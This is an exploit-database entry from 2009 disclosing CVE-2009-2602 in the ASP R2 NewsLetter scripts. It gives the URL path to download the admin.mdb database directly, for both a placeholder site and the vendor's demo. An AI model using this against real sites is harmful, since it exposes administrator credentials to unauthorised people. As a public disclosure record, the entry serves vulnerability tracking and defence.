R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure
Author: TiGeR-Dz
type: webapps
platform: asp
port:
date_added: 2009-05-31
date_updated:
verified: 1
codes: OSVDB-54835;CVE-2009-2602
tags:
aliases:
screenshot_url:
application_url:
---------------------------------------------------------------
---------------------------------------------------------------
R2 Newsletter Store (admin.mdb) Remote Admin Disclosure
Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http:/www.r2newsletter.com
Script:R2 Newsletter Store
Download:http://www.r2newsletter.com/shop/store/dynamicIndex.asp
---------------------------------------------------------------
Exploit:
-------
http://www.site.com/[script]/admin.asp
go to
http://www.site.com/[script]/admin.mdb
--------------------------------------
----------------------------------------------------------------
Dem0
----
http://www.r2newsletter.com/statsdemo/admin.asp
go to
http://www.r2newsletter.com/statsdemo/admin.mdb
--------------------------------------
Greeting To ALL My Friends (Dz)
# milw0rm.com [2009-06-01]